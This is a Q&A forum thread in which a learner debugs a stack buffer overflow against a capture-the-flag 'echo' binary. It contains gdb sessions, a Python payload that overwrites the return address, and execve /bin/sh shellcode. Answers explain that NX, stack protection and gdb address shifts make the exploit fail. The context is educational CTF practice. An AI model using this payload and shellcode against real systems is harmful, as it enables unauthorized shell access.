# C Simple Buffer Overflow

Tags: c, buffer, buffer-overflow

I'm trying to learn how buffer overflows work and how this can be used.
I'm solving a simple challenge (backdoorlabs echo challenge) by trying to exploit a supplied binary file.

(see: http://hack.bckdr.in/ECHO/echo)

I think I'm doing everything right (accoring to the guides and tutorials I have been reading) but still it is not working and driving me crazy for hours now already.

The bufferoverflow lets me over write the next instruction (eip).

```
(gdb) run <<< $(python -c 'print "A"*62+"BBBB"')    

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)
```

So I'm able to overwrite the next eip, now lets add some 21 bytes shell code which spawns a shell and try to find the address where it is.

```
(gdb) run <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"BBBB"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/100x $sp
0xbffff750:     0xe1f7c931      0x2f2f6851      0x2f686873      0x896e6962
0xbffff760:     0xcd0bb0e3      0xbfff0080      0xbffff80c      0xb7fff3d0
0xbffff770:     0x08048480      0xffffffff      0x0012efc4      0x080482d8
0xbffff780:     0x00000001      0xbffff7c0      0x0011eb25      0x0012fab0
```

Bingo the shellcode is right here loaded at 0xbffff750, so that is the adress we want to adress the eip to..

Until now everything looks right to me so I try it with the right values found.

```
(gdb) run <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
Starting program: /tmp/vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀

Program received signal SIGSEGV, Segmentation fault.
0xbffff750 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.192.el6.i686
(gdb)


(gdb) x/i $eip
=> 0xbffff750:  xor    %ecx,%ecx
(gdb)
```

The eip got changed to the right adress and the shellcode is in place however when i try it in my shell it does not work and still segfaults as you can see.

```
[rick@TESTBOX tmp]$ ./vul <<< $(python -c 'print "A"*62+"\x50\xf7\xff\xbf"+"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"')
ECHO: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP▒▒▒1▒▒▒Qh//shh/bin▒▒
         ̀
Segmentation fault
[rick@TESTBOX tmp]$
```

Anyone here has some thoughts about this, sees an error or has any other ideas ?
As mentioned I'm a newbie trying to understand the basic principles and obviously I'm doing something wrong.

Comment: I think the binary is compiled with stack protection probably ?

Comment: Is this something standard used by the gcc compiler ?

Comment: It's done by most modern operating systems, to prevent these types of exploits. You have to use special options to disable it.

Comment: Ok did this and the Seg error disapperead but still no shell is spawning.. any clues ?

Comment: This binary is NX enabled. You can't exploit it by using shellcode. You could check protection by this [tool](http://tk-blog.blogspot.tw/search/label/checksec.sh).

Answer (score 0, accepted):

I think your problem is:

> there is a difference between the real execution of a program and the gdb-controlled one.

You need to

1. predict this difference. And [this question](https://reverseengineering.stackexchange.com/questions/2983/how-to-predict-address-space-layout-differences-between-real-and-gdb-controlled) gives an example how to do it.

OR

2. I alse faced your problem months before. At that time, I observed this difference. But I did not use this way to find the difference, instead, I used the brute force way exampled in *The Art of Exploitation 0x331*: try different offsets with a shell script.

[This question](https://stackoverflow.com/questions/2340259/how-to-turn-off-gcc-compiler-optimization-to-enable-buffer-overflow) might help you in the future, which tells you how to turn off some security functions to allow you to attack.

Comment: Thanks for your answer, it makes sense for me. Just an idea, if I would change the shellcode to echo to some file instead of a shell then when executed right in gdb it should have echo to the file, correct ?

Comment: I also want to mention that bananaappletw is also right because this binary has some protections (like stack execution protection which causes the segfault I believe). I used my own source and compiled it without any protections and indeed stumbled into the problem you are describing.

Comment: @skanilos I think it should work, but the shellcode to echo to a file may be much more complicated.Yes, the stack

Comment: Yes, the stack guard is enabled by default in gcc, so you need to disable it to attack.